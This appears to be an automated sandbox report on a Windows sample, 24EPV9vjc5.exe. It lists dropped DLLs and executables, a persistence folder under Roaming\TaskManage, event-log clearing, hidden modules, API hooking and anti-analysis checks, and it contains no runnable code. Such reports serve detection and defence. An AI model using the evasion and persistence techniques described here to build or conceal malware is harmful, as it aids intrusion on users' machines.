Source: 24EPV9vjc5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 24EPV9vjc5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 24EPV9vjc5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 24EPV9vjc5.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,

2_2_5BB3CB21

Source: lrgstosohhljqy.11.dr	Static PE information: real checksum: 0x2865d3 should be: 0x28b45f
Source: QtCore4.dll.2.dr	Static PE information: real checksum: 0x283beb should be: 0x284aa4
Source: qlar.5.dr	Static PE information: real checksum: 0x2865d3 should be: 0x28b45f
Source: QtCore4.dll.3.dr	Static PE information: real checksum: 0x283beb should be: 0x284aa4
Source: Fondue.dll.2.dr	Static PE information: real checksum: 0x34dc9 should be: 0x3baae
Source: StarBurn.dll.2.dr	Static PE information: real checksum: 0xa4afa should be: 0xab76c
Source: StarBurn.dll.3.dr	Static PE information: real checksum: 0xa4afa should be: 0xab76c

Source: 24EPV9vjc5.exe	Static PE information: section name: .wixburn
Source: 24EPV9vjc5.exe.0.dr	Static PE information: section name: .wixburn
Source: LocalCtrl_alpha_v3.exe.5.dr	Static PE information: section name: Shared
Source: qlar.5.dr	Static PE information: section name: .xdata
Source: qlar.5.dr	Static PE information: section name: gjwrx
Source: lrgstosohhljqy.11.dr	Static PE information: section name: .xdata
Source: lrgstosohhljqy.11.dr	Static PE information: section name: gjwrx

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000EEAD6 push ecx; ret	0_2_000EEAE9
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0067EAD6 push ecx; ret	2_2_0067EAE9
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4A0CC5 push ecx; ret	3_2_6C4A0CD8
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C492D88 push eax; ret	3_2_6C492DA6
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4AB658 push ecx; ret	3_2_6C4AB66B
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2B2D88 push eax; ret	4_2_6B2B2DA6
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C0CC5 push ecx; ret	4_2_6B2C0CD8
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2DA6AA push EF3FEFD4h; iretd	4_2_6B2DA6B1
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2D9CD8 pushad ; iretd	4_2_6B2D9CE6
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2CB658 push ecx; ret	4_2_6B2CB66B
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B3A3801 push ecx; ret	4_2_6B3A3814
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B3A3D95 push ecx; ret	4_2_6B3A3DA8

Source: msvcr100.dll.2.dr	Static PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.2.dr	Static PE information: section name: .text entropy: 6.9340411158815725
Source: msvcr100.dll.3.dr	Static PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.3.dr	Static PE information: section name: .text entropy: 6.9340411158815725

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\msvcp100.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Jump to dropped file
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dll	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtCore4.dll	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtXml4.dll	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\Fondue.dll	Jump to dropped file
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dll	Jump to dropped file
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dll	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtGui4.dll	Jump to dropped file
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	File created: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Jump to dropped file
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dll	Jump to dropped file
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dll	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtNetwork4.dll	Jump to dropped file
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dll	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Jump to dropped file
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\lrgstosohhljqy	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\StarBurn.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\qlar	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\msvcr100.dll	Jump to dropped file
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	File created: C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dll	Jump to dropped file

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\msvcp100.dll	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtCore4.dll	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtXml4.dll	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\Fondue.dll	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtGui4.dll	Jump to dropped file
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	File created: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\QtNetwork4.dll	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\StarBurn.dll	Jump to dropped file
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	File created: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\msvcr100.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\qlar			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\lrgstosohhljqy			Jump to dropped file

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB43AA1 _StartService_@12,lstrlenW,GlobalAlloc,WideCharToMultiByte,StartServiceA,MultiByteToWideChar,GlobalFree,

2_2_5BB43AA1

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\QLAR
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\LRGSTOSOHHLJQY

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3DE09 _ClearEventLog_@8,SetLastError,newMultiByteFromWideChar,ClearEventLogA,GlobalFree,

2_2_5BB3DE09

Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe

Code function: 3_2_6C4EA3DD GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,

3_2_6C4EA3DD

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	API/Special instruction interceptor: Address: 6C157C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	API/Special instruction interceptor: Address: 6C157C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	API/Special instruction interceptor: Address: 6C157945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6C153B54
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	API/Special instruction interceptor: Address: 6BF47C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	API/Special instruction interceptor: Address: 6BF47945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6BF43B54

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Code function: _EnumServicesStatus_@32,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,EnumServicesStatusA,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,

2_2_5BB42F59

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Dropped PE file which has not been started: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\Fondue.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lrgstosohhljqy	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qlar	Jump to dropped file

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Evaded block: after key decision

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Evasive API call chain: GetLocalTime,DecisionNodes

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

API coverage: 4.3 %

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe TID: 7920	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 4072	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 4072	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 6764	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 6764	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000FFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 000FFF61h	0_2_000FFEC6
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000FFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 000FFF5Ah	0_2_000FFEC6
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0068FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0068FF61h	2_2_0068FEC6
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0068FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0068FF5Ah	2_2_0068FEC6

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000C3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	0_2_000C3CC4
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_00104440 FindFirstFileW,FindClose,	0_2_00104440
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000D9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	0_2_000D9B43
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000F7B87 FindFirstFileExW,	0_2_000F7B87
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_00694440 FindFirstFileW,FindClose,	2_2_00694440
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_00669B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	2_2_00669B43
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_00687B87 FindFirstFileExW,	2_2_00687B87
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_00653CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	2_2_00653CC4
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_5BB3D32E _FindFirstFileEx_@24,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,	2_2_5BB3D32E
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_5BB3D43A _FindFirstFile_@8,SetLastError,memset,newMultiByteFromWideChar,FindFirstFileA,MultiByteToWideChar,MultiByteToWideChar,GlobalFree,	2_2_5BB3D43A
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4ECC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	3_2_6C4ECC23
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4EC8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	3_2_6C4EC8FD
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4B81A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	3_2_6C4B81A1
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B31088A _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6B31088A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B30C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	4_2_6B30C8FD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B30CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	4_2_6B30CC23
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B310CBB _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6B310CBB
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2D81A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6B2D81A1
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B30E0BD _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,	4_2_6B30E0BD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B30DBC0 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,	4_2_6B30DBC0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B30F9DD _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6B30F9DD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B30FF0E _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6B30FF0E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B31110C _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6B31110C
